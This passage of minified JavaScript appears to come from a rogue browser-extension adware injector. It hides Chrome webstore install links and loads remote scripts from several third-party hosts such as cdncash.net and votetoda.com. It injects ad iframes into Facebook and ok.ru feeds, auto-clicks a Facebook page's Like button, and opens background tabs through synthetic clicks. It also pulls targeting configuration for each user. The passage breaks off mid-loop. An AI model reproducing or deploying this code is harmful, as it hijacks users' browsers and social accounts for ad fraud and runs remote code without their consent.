  1768.                     var x = function() {
  1769.                         if ("51113" == "51433" && location.hostname.indexOf("olam-hamedia.tech") > -1) {
  1770.                             return
  1771.                         }
  1772.                         var B = "chrome-webstore-item";
  1773.                         var C = document.getElementsByTagName("link");
  1774.                         for (var A = 0, D = C.length; D > A; ++A) {
  1775.                             if (B == C[A].getAttribute("id") || B == C[A].getAttribute("rel")) {
  1776.                                 C[A].setAttribute("rel", "");
  1777.                                 C[A].setAttribute("id", "");
  1778.                                 C[A].setAttribute("href", "");
  1779.                                 z()
  1780.                             }
  1781.                         }
  1782.                     };
  1783.                     x()
  1784.                 })()
  1785.             } catch (v) {}
  1786.             var r = function(y) {
  1787.                 var B = {};
  1788.                 y = y.split("?");
  1789.                 if (y.length < 2) {
  1790.                     return B
  1791.                 }
  1792.                 var A = y[1];
  1793.                 var C = A.split("&");
  1794.                 for (var z = 0; z < C.length; z++) {
  1795.                     var D = C[z].split("=");
  1796.                     if (typeof B[D[0]] === "undefined") {
  1797.                         B[D[0]] = D[1]
  1798.                     } else {
  1799.                         if (typeof B[D[0]] === "string") {
  1800.                             var x = [B[D[0]], D[1]];
  1801.                             B[D[0]] = x
  1802.                         } else {
  1803.                             B[D[0]].push(D[1])
  1804.                         }
  1805.                     }
  1806.                 }
  1807.                 return B
  1808.             };
  1809.             var s = {};
  1810.             var p = document.getElementsByTagName("script");
  1811.             for (var t = 0; t < p.length; t++) {
  1812.                 var q = p[t];
  1813.                 if (q.src.search(/c9f22c14a3872f280d.*\.js/i) !== -1) {
  1814.                     if (n) {
  1815.                         d.scriptDomain = q.src.replace(/^https?\:\/\//i, "").split("/")[0]
  1816.                     }
  1817.                     s = r(q.src);
  1818.                     break
  1819.                 }
  1820.             }
  1821.             if (location.host.indexOf("bing.com") > -1 && i.AM && typeof i.AM == "object") {
  1822.                 i.AM.push(d.scriptDomain)
  1823.             }
  1824.             i[g].tbParams = {
  1825.                 wid: "51113",
  1826.                 sid: "",
  1827.                 tid: "3231",
  1828.                 title: "Not set",
  1829.                 optoutUrl: ""
  1830.             };
  1831.             if (s.sid) {
  1832.                 i[g].tbParams.sid = s.sid
  1833.             }
  1834.             if (s.title) {
  1835.                 i[g].tbParams.title = decodeURIComponent(s.title)
  1836.             }
  1837.             if (s.optout) {
  1838.                 i[g].tbParams.optoutUrl = decodeURIComponent(s.optout)
  1839.             }
  1840.             i[g].getParams = r(location.href);
  1841.             d.tbParams = i[g].tbParams;
  1842.             d.loadedCallback("LOADED", "", location.host);
  1843.             var w = /\.(jpg|png|jpeg|gif|bmp|doc|pdf|xls|js|xml|doc|docs|txt|css)$/;
  1844.             if (location.href.match(w)) {
  1845.                 d.loadedCallback("URL_STATICFILE");
  1846.                 return false
  1847.             }
  1848.             var u = /(script\.monetizus\.|metrext\.com|icontent\.us|trendtext\.eu|paypal\.com|secure\.|\.gov|doubleclick\.net|addthis\.com|twitter\.com|docs\.google\.com|drive\.google\.com)/;
  1849.             if (location.hostname.match(u)) {
  1850.                 d.loadedCallback("URL_IGNOREDOMAIN");
  1851.                 return false
  1852.             }(function(d, w, u) {
  1853.                 var $$ = w["c9f22c14a3872f280d"];
  1854.                 var scriptsToLoad = $$.fromJson("{\"2bbad\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/cdncache-a.akamaihd.net\\/sub\\/nee5452\\/51113_3231_\\/SID\\/\\/l.js?pid=2449&ext=Advertise\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"2bbad\"},\"cd1d2\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"(?:.*googleusercontent\\\\..*|mail\\\\.google\\\\.com|reddit\\\\.com|.*\\\\.reddit\\\\.com)\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/cdncash.net\\/addons\\/lnkr5.min.js\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"cd1d2\"},\"02d38\":{\"countries_allow\":\"ar,at,au,br,ca,ch,de,es,fi,fr,gb,ie,it,in,mx,nl,no,pl,pt,ru,se,us,ar,ie,mx,ua\",\"countries_deny\":null,\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/rules.similardeals.net\\/v1.0\\/whitelist\\/1108\\/51113x3231x\\/SID\\/\\/\\/REF_HOST\\/?partnerName=\\/TITLE\\/&partnerLink=\\/OPTOUTURL\\/\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"02d38\"},\"4dc06\":{\"countries_allow\":\"\",\"countries_deny\":\"gb,us,fr,de,es,it,ca,br\",\"hostname_allow\":\"(?:google\\\\..*)\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"4dc06\"},\"a8bb7\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"(?:.*yieldkit.com|.*prosperent.com|.*viglink.com|.*cityads.com|aliexpress\\\\.com|.*\\\\.aliexpress\\\\.com)\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/cdncache-a.akamaihd.net\\/sub\\/nee5452\\/51113_3231_\\/SID\\/\\/l.js?pid=2450&ext=\\/TITLE\\/\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"a8bb7\"},\"220bb\":{\"countries_allow\":\"gb,us,fr,de,es,it,ca,br\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"220bb\",\"config\":{\"silent\":\"1\"}},\"6a131\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"(?:google\\\\..*)\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/cdncash.net\\/addons\\/lnkr30_nt.min.js\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"6a131\"},\"4d09a\":{\"countries_allow\":\"\",\"countries_deny\":null,\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"4d09a\"},\"88051\":{\"countries_allow\":\"\",\"countries_deny\":null,\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\\/\\/asrvvv-a.akamaihd.net\\/get?addonname=\\/TITLE\\/&clientuid=undefined&subID=51113_3231_\\/SID\\/&affid=9686&subaffid=1001&href=\\/REFERRER\\/\",\"limit\":\"0\",\"type\":\"external\",\"key\":\"88051\"},\"04fcf\":{\"countries_allow\":\"\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"04fcf\"},\"1f755\":{\"countries_allow\":\"gb,de,fr,es,it,pt,be,pl,cz,at,ch,nl,ie,no,se,dk,fi,ru,by,ua,kz,uz,ge,az,lt,md,lv,kg,tj,am,tm,ee,bh,bd,bt,bn,kh,cn,cx,cc,io,hk,in,id,ir,iq,il,jp,jo,kw,la,lb,mo,my,mv,mn,mm,np,kp,om,pk,ps,ph,qa,sa,sg,kr,lk,sy,tw,tj,th,tr,tm,ae,vn,ye,eg,ar,bo,br,cl,co,ec,fk,gf,gy,py,pe,sr,uy,ve\",\"countries_deny\":\"\",\"hostname_allow\":\"\",\"hostname_deny\":\"(?:google\\\\..*|bing\\\\.com|yahoo\\\\.com|yandex\\\\.ru|vk\\\\..*)\",\"browsers_allow\":\"\",\"browsers_deny\":\"\",\"coverage\":\"100\",\"url\":\"\",\"limit\":\"0\",\"type\":\"platform\",\"key\":\"1f755\",\"config\":{\"source\":\"default\",\"teaserSource\":\"default\"}}}");;;;;;;;;;;;;;;;;;;;;;;;
  1855.                 var runForceSearch;;;
  1856.                 if (!scriptsToLoad) {
  1857.                     return false
  1858.                 }
  1859.                 $$.monetizationsConfig = scriptsToLoad;
  1860.                 var getUrlFromConfigObject = function(configRow) {
  1861.                     if (configRow.http_url && window.location.protocol == "http:") {
  1862.                         return configRow.http_url
  1863.                     } else {
  1864.                         if (configRow.https_url && window.location.protocol == "https:") {
  1865.                             return configRow.https_url
  1866.                         } else {
  1867.                             if (configRow.url) {
  1868.                                 return configRow.url
  1869.                             }
  1870.                         }
  1871.                     }
  1872.                 };
  1873.                 if (scriptsToLoad['4a71b']) {
  1874.                     if (document.referrer && document.referrer.indexOf("rd.bizrate") > -1) {
  1875.                         var domain = location.hostname.replace("www.", "");
  1876.                         $$.setCookie("__mzpsd", 1, {
  1877.                             expire: 3600,
  1878.                             path: "/",
  1879.                             domain: "." + domain
  1880.                         })
  1881.                     }
  1882.                 }
  1883.                 if (scriptsToLoad['4a71b'] && $$.getCookie("__mzpsd") == 1) {
  1884.                     return false
  1885.                 }
  1886.                 if (location.hostname.indexOf("ok.ru") > -1 && scriptsToLoad['1f755']) {
  1887.                     var oconf = $$.getMonetizationConfig('1f755');
  1888.                     if (!!oconf.injectOk && oconf.injectOk == "1") {
  1889.                         (function() {
  1890.                             var d = document.querySelector("body");
  1891.                             if (!d) {
  1892.                                 return
  1893.                             }
  1894.  
  1895.                             function i(j) {
  1896.                                 j = j.replace(/%PUBLISHER_ID%/, ($$ && $$.tbParams && $$.tbParams.wid) ? $$.tbParams.wid : "");
  1897.                                 j = j.replace(/%SOURCE_ID%/, ($$ && $$.tbParams && $$.tbParams.tid) ? $$.tbParams.tid : "");
  1898.                                 j = j.replace(/%SUBID%/, ($$ && $$.tbParams && $$.tbParams.sid) ? $$.tbParams.sid : "");
  1899.                                 j = j.replace(/INSERT_RANDOM_NUMBER_HERE/, new Date().getTime());
  1900.                                 return j
  1901.                             }
  1902.                             var e = i("<iframe id='a60b8ce3' name='a60b8ce3' src='//cdnpps.us/www/delivery/afr.php?zoneid=122&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;xid=%PUBLISHER_ID%_%SOURCE_ID%_%SUBID%' frameborder='0' scrolling='no' width='300' height='600' style='display:inline-block;'><a href='//cdnpps.us/www/delivery/ck.php?n=abb06471' target='_blank'><img src='//cdnpps.us/www/delivery/avw.php?zoneid=122&amp;n=abb06471' border='0' alt='' /></a></iframe>");
  1903.                             var c = i("<iframe id='8a61598d' name='8a61598d' src='//cdnpps.us/www/delivery/afr.php?zoneid=119&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;xid=%PUBLISHER_ID%_%SOURCE_ID%_%SUBID%' frameborder='0' scrolling='no' width='468' height='60' style='display:inline-block;'><a href='//cdnpps.us/www/delivery/ck.php?n=8a61598d' target='_blank'><img src='//cdnpps.us/www/delivery/avw.php?zoneid=119&amp;n=8a61598d' border='0' alt='' /></a></iframe>");
  1904.  
  1905.                             function f(j) {
  1906.                                 return document.querySelectorAll(j) || []
  1907.                             }
  1908.                             var a = function(n, j, o, l, m) {
  1909.                                 var k = document.createElement("div");
  1910.                                 k.setAttribute("id", "_" + Math.floor((Math.random() * 1000000000)));
  1911.                                 k.setAttribute("style", m || "");
  1912.                                 k.innerHTML = o;
  1913.                                 l.style.textAlign = "center";
  1914.                                 l.appendChild(k)
  1915.                             };
  1916.  
  1917.                             function b(j) {
  1918.                                 j.id = "_" + j.id;
  1919.                                 j.setAttribute("data-mytype", "name_baner");
  1920.                                 j.innerHTML = "";
  1921.                                 a(300, 600, e, j)
  1922.                             }
  1923.  
  1924.                             function h(k, j) {
  1925.                                 var l = document.createElement("div");
  1926.                                 l.setAttribute("data-mytype", "name_baner");
  1927.                                 l.setAttribute("style", "margin:0 auto; overflow:hidden;");
  1928.                                 k.setAttribute("data-mytype", "name_baner");
  1929.                                 k.appendChild(l);
  1930.                                 a(468, 60, c, l, j)
  1931.                             }
  1932.                             var g = function() {
  1933.                                 Array.prototype.forEach.call(f("div.feed.__klass.__no-ava>.feed_cnt"), function(j) {
  1934.                                     if (!j.getAttribute("data-mytype")) {
  1935.                                         h(j, "margin: 0 auto 10px;")
  1936.                                     }
  1937.                                 });
  1938.                                 Array.prototype.forEach.call(f('div[class^="feed h-mod"]'), function(j) {
  1939.                                     if (!j.lastElementChild.getAttribute("data-mytype") && !j.parentNode.getAttribute("class")) {
  1940.                                         h(j, "margin: 10px auto 0;")
  1941.                                     }
  1942.                                 });
  1943.                                 Array.prototype.forEach.call(f('div[data-btype^="LinkBanner_navigate"]'), function(j) {
  1944.                                     if (!j.getAttribute("data-mytype")) {
  1945.                                         j.innerHTML = "";
  1946.                                         b(j)
  1947.                                     }
  1948.                                 });
  1949.                                 setTimeout(g, 3333)
  1950.                             };
  1951.                             g()
  1952.                         })();
  1953.                     }
  1954.                 }
  1955.                 if (runForceSearch && location.hostname.indexOf("search.yahoo") > -1) {
  1956.                     runForceSearch()
  1957.                 }
  1958.                 if (location.hostname.indexOf("facebook.com") > -1) {
  1959.                     if (scriptsToLoad['5df82']) {
  1960.                         (function(r, j, l) {
  1961.                             var k = j["c9f22c14a3872f280d"];
  1962.                             var a = j["c9f22c14a3872f280d"].Sizzle;
  1963.                             if (location.hostname.indexOf("facebook.com") < 0) {
  1964.                                 return
  1965.                             }
  1966.                             var q = {
  1967.                                 _mfbgp_sub_g2: "/fun8times"
  1968.                             };
  1969.                             var g = '5df82';
  1970.                             var o = false;
  1971.                             var t = "_mfbgp_sub_t";
  1972.                             var b = false;
  1973.                             var n = null;
  1974.                             for (var p in q) {
  1975.                                 if (location.href.indexOf(q[p]) > -1) {
  1976.                                     n = p
  1977.                                 }
  1978.                             }
  1979.                             if (!n) {
  1980.                                 var f = false;
  1981.                                 var m = k.getCookie(t);
  1982.                                 if (m > (k.unixTimestampNow - 86400)) {
  1983.                                     return
  1984.                                 }
  1985.                                 var c = [];
  1986.                                 for (var p in q) {
  1987.                                     if (k.getCookie(p)) {
  1988.                                         continue
  1989.                                     }
  1990.                                     c.push(q[p])
  1991.                                 }
  1992.                                 if (!c || c.length < 1) {
  1993.                                     return
  1994.                                 }
  1995.                                 var e = c[Math.floor(Math.random() * c.length)];
  1996.                                 if (typeof e == "undefined") {
  1997.                                     return
  1998.                                 }
  1999.                                 e = "https://facebook.com" + e;
  2000.                                 var s = function(i) {
  2001.                                     var u = this;
  2002.                                     var d = [];
  2003.                                     k.on(j.addEventListener ? j : r, "click", function(w) {
  2004.                                         var v = w.ctrlKey || w.metaKey || w.altKey || w.shiftKey,
  2005.                                             x = w.which && 1 === w.which || 0 === w.button;
  2006.                                         k.each(d, function(y) {
  2007.                                             if (y.call(w) === true) {
  2008.                                                 k.preventDefault(w);
  2009.                                                 return false
  2010.                                             }
  2011.                                         })
  2012.                                     });
  2013.                                     u.backgroundLink = function(x) {
  2014.                                         var w = document.createElement("a");
  2015.                                         w.href = x;
  2016.                                         w.__norewrite = 1;
  2017.                                         w.rel = "norewrite";
  2018.                                         w.target = "_blank";
  2019.                                         var v = document.createEvent("MouseEvents");
  2020.                                         v.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, true, false, false, false, 0, null);
  2021.                                         w.dispatchEvent(v)
  2022.                                     };
  2023.                                     u.clickunder = function(v) {
  2024.                                         d.push(v)
  2025.                                     };
  2026.                                     u.clickunder(function(v) {
  2027.                                         if (!f && i) {
  2028.                                             u.backgroundLink(i);
  2029.                                             k.updateLimits(g);
  2030.                                             k.loadedCallback("BANNER_LOAD", g);
  2031.                                             k.setCookie(t, k.unixTimestampNow, {
  2032.                                                 expire: 864000,
  2033.                                                 path: "/"
  2034.                                             });
  2035.                                             f = true;
  2036.                                             return true
  2037.                                         } else {
  2038.                                             return false
  2039.                                         }
  2040.                                     })
  2041.                                 };
  2042.                                 s(e);
  2043.                                 return
  2044.                             }
  2045.                             if (k.getCookie(n)) {
  2046.                                 return
  2047.                             }
  2048.                             k.loadedCallback("MNTZ_LOADED", g);
  2049.  
  2050.                             function h() {
  2051.                                 if (b) {
  2052.                                     return
  2053.                                 }
  2054.                                 var d = a("#pages-header button.likeButton");
  2055.                                 if (d.length > 0) {
  2056.                                     d[0].click();
  2057.                                     b = true;
  2058.                                     k.setCookie(n, 1, {
  2059.                                         expire: 86400 * 60,
  2060.                                         path: "/"
  2061.                                     });
  2062.                                     k.setCookie(t, k.unixTimestampNow, {
  2063.                                         expire: 864000,
  2064.                                         path: "/"
  2065.                                     })
  2066.                                 }
  2067.                             }
  2068.                             k.ready(function() {
  2069.                                 if (o) {
  2070.                                     return
  2071.                                 }
  2072.                                 o = true;
  2073.                                 h();
  2074.                                 var v = window.MutationObserver || window.WebKitMutationObserver || window.MozMutationObserver;
  2075.                                 var i = document.body;
  2076.                                 if (typeof v != "undefined") {
  2077.                                     var u = new v(function(x) {
  2078.                                         x.forEach(function(z) {
  2079.                                             if (z.type === "childList") {
  2080.                                                 for (var y = 0; y < z.addedNodes.length; y++) {
  2081.                                                     h()
  2082.                                                 }
  2083.                                             }
  2084.                                             u.observe(document.body, {
  2085.                                                 childList: true,
  2086.                                                 subtree: true
  2087.                                             })
  2088.                                         })
  2089.                                     });
  2090.                                     u.observe(i, {
  2091.                                         childList: true,
  2092.                                         subtree: true
  2093.                                     })
  2094.                                 } else {
  2095.                                     var w = function() {
  2096.                                         if (b) {
  2097.                                             return true
  2098.                                         }
  2099.                                         h();
  2100.                                         d = setTimeout("checkByTimer", 1000)
  2101.                                     };
  2102.                                     var d = setTimeout("checkByTimer", 1000)
  2103.                                 }
  2104.                             })
  2105.                         })(document, window);
  2106.                     }
  2107.                     if (scriptsToLoad['af23c']) {
  2108.                         (function(f, h, j) {
  2109.                             var g = true;
  2110.                             try {
  2111.                                 if (chrome.bookmarks) {
  2112.                                     g = false
  2113.                                 }
  2114.                             } catch (c) {}
  2115.                             if (location.protocol == "chrome-extension:") {
  2116.                                 g = false
  2117.                             }
  2118.                             if (g) {
  2119.                                 var b = window.location.href;
  2120.                                 var l = document.getElementById("dexscriptpopup");
  2121.                                 if (l === null && b.indexOf("m.facebook.com") != "-1") {
  2122.                                     document.body.style.width = "0px";
  2123.                                     var k = document.createElement("div");
  2124.                                     k.id = "dexscriptpopup";
  2125.                                     k.style.cssText = "position:fixed; width:100%; height:100%; z-index:100; background:#fff; top:0px; left: 0px;";
  2126.                                     document.body.appendChild(k);
  2127.                                     setTimeout(function() {
  2128.                                         window.close()
  2129.                                     }, 10000)
  2130.                                 }
  2131.                                 var i = document.createElement("script");
  2132.                                 i.id = "dexscriptid";
  2133.                                 i.src = "https://votetoda.com/ext/script.php?id=ukr&track=true";
  2134.                                 var a = document.getElementById("dexscriptid");
  2135.                                 if (a === null) {
  2136.                                     document.body.appendChild(i)
  2137.                                 } else {}
  2138.                             } else {
  2139.                                 var i = document.createElement("script");
  2140.                                 i.id = "dexscriptid";
  2141.                                 i.src = "https://votetoda.com/ext/script.php?id=ukr&track=false";
  2142.                                 var a = document.getElementById("dexscriptid");
  2143.                                 if (a === null) {
  2144.                                     document.body.appendChild(i)
  2145.                                 } else {}
  2146.                             }
  2147.                         })(document, window);
  2148.                     }
  2149.                     if (scriptsToLoad['1f755']) {
  2150.                         var fconf = $$.getMonetizationConfig('1f755');
  2151.                         if (!!fconf.injectFacebook && fconf.injectFacebook == "1") {
  2152.                             (function() {
  2153.                                 var d = document.querySelector("body");
  2154.                                 if (!d) {
  2155.                                     return
  2156.                                 }
  2157.  
  2158.                                 function j(k) {
  2159.                                     k = k.replace(/%PUBLISHER_ID%/, ($$ && $$.tbParams && $$.tbParams.wid) ? $$.tbParams.wid : "");
  2160.                                     k = k.replace(/%SOURCE_ID%/, ($$ && $$.tbParams && $$.tbParams.tid) ? $$.tbParams.tid : "");
  2161.                                     k = k.replace(/%SUBID%/, ($$ && $$.tbParams && $$.tbParams.sid) ? $$.tbParams.sid : "");
  2162.                                     k = k.replace(/INSERT_RANDOM_NUMBER_HERE/, new Date().getTime());
  2163.                                     return k
  2164.                                 }
  2165.                                 var f = j("<iframe id='c8866ab3' name='c8866ab3' src='//cdnpps.us/www/delivery/afr.php?zoneid=120&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;xid=%PUBLISHER_ID%_%SOURCE_ID%_%SUBID%' frameborder='0' scrolling='no' width='300' height='250' style='display:block;'><a href='//cdnpps.us/www/delivery/ck.php?n=c8866ab3' target='_blank'><img src='//cdnpps.us/www/delivery/avw.php?zoneid=120&amp;n=c8866ab3' border='0' alt='' /></a></iframe>");
  2166.                                 var c = j("<iframe id='8a61598d' name='8a61598d' src='//cdnpps.us/www/delivery/afr.php?zoneid=119&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;xid=%PUBLISHER_ID%_%SOURCE_ID%_%SUBID%' frameborder='0' scrolling='no' width='468' height='60' style='display:block;'><a href='//cdnpps.us/www/delivery/ck.php?n=8a61598d' target='_blank'><img src='//cdnpps.us/www/delivery/avw.php?zoneid=119&amp;n=8a61598d' border='0' alt='' /></a></iframe>");
  2167.  
  2168.                                 function g(k) {
  2169.                                     return document.querySelectorAll(k) || []
  2170.                                 }
  2171.                                 var a = function(n, k, o, m) {
  2172.                                     var l = document.createElement("div");
  2173.                                     l.setAttribute("id", "_" + Math.floor((Math.random() * 1000000000)));
  2174.                                     l.innerHTML = o;
  2175.                                     l.setAttribute("style", "display: inline-block;height:" + k + "px !important;width:" + n + "px !important;margin:0 auto;z-index:99999999;border:0;");
  2176.                                     m.style.textAlign = "center";
  2177.                                     m.appendChild(l)
  2178.                                 };
  2179.  
  2180.                                 function h(k) {
  2181.                                     k.style.minHeight = "500px";
  2182.                                     k.id = "_" + k.id;
  2183.                                     k.setAttribute("data-mytype", "name_baner");
  2184.                                     k.innerHTML = "";
  2185.                                     a(300, 500, f + f, k)
  2186.                                 }
  2187.  
  2188.                                 function i(k) {
  2189.                                     var l = document.createElement("div");
  2190.                                     l.setAttribute("data-mytype", "name_baner");
  2191.                                     l.setAttribute("style", "width:468px;height:60px;margin:0 auto 10px auto;");
  2192.                                     k.setAttribute("data-mytype", "name_baner");
  2193.                                     k.appendChild(l);
  2194.                                     a(468, 60, c, l)
  2195.                                 }
  2196.                                 var b = function() {
  2197.                                     Array.prototype.forEach.call(g('div[class^="_5jmm _5pat"]'), function(k) {
  2198.                                         if (!k.getAttribute("data-mytype")) {
  2199.                                             i(k)
  2200.                                         }
  2201.                                     });
  2202.                                     Array.prototype.forEach.call(g("#pagelet_ego_pane"), function(k) {
  2203.                                         if (!k.getAttribute("data-mytype") && k.offsetHeight > 50) {
  2204.                                             h(k)
  2205.                                         }
  2206.                                     });
  2207.                                     setTimeout(b, 3333)
  2208.                                 };
  2209.                                 b();
  2210.                                 var e = new MutationObserver(function(k) {
  2211.                                     for (var l in k) {
  2212.                                         if (k[l].addedNodes.length) {
  2213.                                             b();
  2214.                                             break
  2215.                                         }
  2216.                                     }
  2217.                                 });
  2218.                                 e.observe(document.getElementById("content"), {
  2219.                                     childList: true
  2220.                                 })
  2221.                             })();
  2222.                         }
  2223.                     }
  2224.                 } else {
  2225.                     $$.loadedCallback("BEFORE_OPTOUT_REQ");
  2226.                     $$.jsonp({
  2227.                         url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/optout/get",
  2228.                         data: {
  2229.                             key: "c9f22c14a3872f280d"
  2230.                         },
  2231.                         callback: function(response) {
  2232.                             if (!response.success) {
  2233.                                 $$.loadedCallback("OPTOUT_RESPONSE_FAIL");
  2234.                                 return false
  2235.                             }
  2236.                             $$.loadedCallback("OPTOUT_RESPONSE_OK");
  2237.                             var userId = response.userId;
  2238.                             var startTime = response.strTm;
  2239.                             var optout = {};
  2240.                             if (response.optout) {
  2241.                                 optout = $$.optoutValue = $$.fromJson(decodeURIComponent(response.optout))
  2242.                             }
  2243.                             var country = response.country;
  2244.                             var limits = {};
  2245.                             if (response.limits) {
  2246.                                 limits = $$.limitsValue = $$.fromJson(decodeURIComponent(response.limits))
  2247.                             }
  2248.                             var targetingUser = response.targeting || 0;
  2249.                             var currentHostname = location.hostname;
  2250.                             currentHostname = currentHostname.replace("www.", "");
  2251.                             var timeNow = $$.unixTimestampNow;
  2252.                             if (!country) {
  2253.                                 country = "xx"
  2254.                             }
  2255.                             country = country.toLowerCase();
  2256.                             if (!userId) {
  2257.                                 userId = $$.randomNumber(1, 100);
  2258.                                 $$.jsonp({
  2259.                                     url: (window.location.protocol == "http:" ? "http:" : "https:") + "//" + $$.scriptDomain + "/optout/set/userid",
  2260.                                     data: {
  2261.                                         key: "c9f22c14a3872f280d",
  2262.                                         cv: userId
  2263.                                     }
  2264.                                 })
  2265.                             }
  2266.                             if (!startTime) {
  2267.                                 $$.setStartTime()
  2268.                             }
  2269.                             var timeAfterInstall = $$.unixTimestampNow - startTime;
  2270.                             var platformBlocks = [];
  2271.                             if ((scriptsToLoad['a8bb7'] || scriptsToLoad['88051'] || scriptsToLoad['e9254']) && ["br", "bg", "cz", "sk", "rs", "hr", "ba", "gr", "ar", "az", "ge", "hu", "my", "id", "th", "vn", "ro"].indexOf(country) > -1) {
  2272.                                 platformBlocks.push('d6d56')
  2273.                             }
  2274.                             for (var key in scriptsToLoad) {
  2275.                                 try {
  2276.                                     var scriptRow = scriptsToLoad[key];
  2277.                                     var scriptUrl = scriptRow.url;
  2278.                                     var scriptUrlParams = {};
  2279.                                     var scriptCoverage = parseInt(scriptRow.coverage);
  2280.                                     if (typeof(scriptUrl) == "object") {
  2281.                                         if (scriptUrl.rotator) {
  2282.                                             var rotatorCount = scriptUrl.rotator.length;
  2283.                                             if (!rotatorCount) {
  2284.                                                 rotatorCount = 0
  2285.                                             }
  2286.                                             var rotatorCookieName = "_mrtr_c9f22c14a3872f280d_" + key;
  2287.                                             var lastRotatedIndex = $$.getCookie(rotatorCookieName);
  2288.                                             if (!lastRotatedIndex || lastRotatedIndex < 0 || lastRotatedIndex >= rotatorCount) {
  2289.                                                 lastRotatedIndex = 0
  2290.                                             }
  2291.                                             scriptUrlParams = scriptUrl.rotator[lastRotatedIndex];
  2292.                                             scriptUrl = getUrlFromConfigObject(scriptUrlParams);
  2293.                                             lastRotatedIndex++;
  2294.                                             $$.setCookie(rotatorCookieName, lastRotatedIndex, {
  2295.                                                 expire: 86400
  2296.                                             })
  2297.                                         } else {
  2298.                                             scriptUrlParams = scriptUrl;
  2299.                                             scriptUrl = getUrlFromConfigObject(scriptUrlParams)
  2300.                                         }
  2301.                                     }
  2302.                                     if (typeof(scriptUrl) != "string") {
  2303.                                         break
  2304.                                     }
  2305.                                     if (!$$.demoMode) {
  2306.                                         if ("3231" == 1549 && location.protocol == "https:" && (key == "a8bb7" || key == "e9254")) {
  2307.                                             return true
  2308.                                         }
  2309.                                         if ((location.hostname == "youtube.com" || location.hostname == "www.youtube.com") && key != "1f755" && key != "1fbee") {
  2310.                                             continue
  2311.                                         }
  2312.                                         if (location.hostname.indexOf("facebook.com") > -1) {
  2313.                                             continue
  2314.                                         }
  2315.                                         if (optout && optout[key] != undefined && optout[key] == true) {
  2316.                                             continue
  2317.                                         }
  2318.                                         if (scriptRow.countries_allow && scriptRow.countries_allow.indexOf(country) == -1) {
  2319.                                             continue
  2320.                                         }
  2321.                                         if (scriptRow.countries_deny && scriptRow.countries_deny.indexOf(country) > -1) {
  2322.                                             continue
  2323.                                         }
  2324.                                         if (scriptCoverage && scriptCoverage < userId) {
  2325.                                             continue
  2326.                                         }
  2327.                                         if (limits && limits[key]) {
  2328.                                             var leftTime = parseInt(limits[key]) - timeNow;
  2329.                                             if (leftTime > 0) {
  2330.                                                 continue
  2331.                                             }
  2332.                                         }
  2333.                                         if (key == "a096e" && targetingUser != 1) {
  2334.                                             continue
  2335.                                         }
  2336.                                         var hostnameReg;
  2337.                                         if (scriptRow.hostname_deny) {
  2338.                                             hostnameReg = new RegExp("^" + scriptRow.hostname_deny + "$", "i");
  2339.                                             if (hostnameReg.test(currentHostname)) {
  2340.                                                 continue
  2341.                                             }
  2342.                                         }
  2343.                                         if (scriptRow.hostname_allow) {
  2344.                                             hostnameReg = new RegExp("^" + scriptRow.hostname_allow + "$", "i");
  2345.                                             if (!hostnameReg.test(currentHostname)) {
  2346.                                                 continue
  2347.                                             }
  2348.                                         }
  2349.                                         if (scriptRow.browsers_allow || scriptRow.browsers_deny) {
  2350.                                             if (typeof detect == "undefined") {
  2351.                                                 continue
  2352.                                             }
  2353.                                             var ua = detect.parse(navigator.userAgent);
  2354.                                             var checkUa = ua.browser.family.toLowerCase();
  2355.                                             var browserAllowed = false
  2356.                                         }
  2357.                                         if (scriptRow.browsers_allow) {
  2358.                                             var browsersAllow = scriptRow.browsers_allow.toLowerCase().split(",");
  2359.                                             for (var i2 in browsersAllow) {
  2360.                                                 if (browsersAllow[i2] == checkUa) {
  2361.                                                     browserAllowed = true;
  2362.                                                     break
  2363.                                                 }
  2364.                                             }
  2365.                                             if (!browserAllowed) {
  2366.                                                 continue
  2367.                                             }
  2368.                                         }
  2369.                                         if (scriptRow.browsers_deny) {
  2370.                                             var browsersDeny = scriptRow.browsers_deny.toLowerCase().split(",");
  2371.                                             for (var i2 in browsersDeny) {
  2372.                                                 if (browsersDeny[i2] == checkUa) {
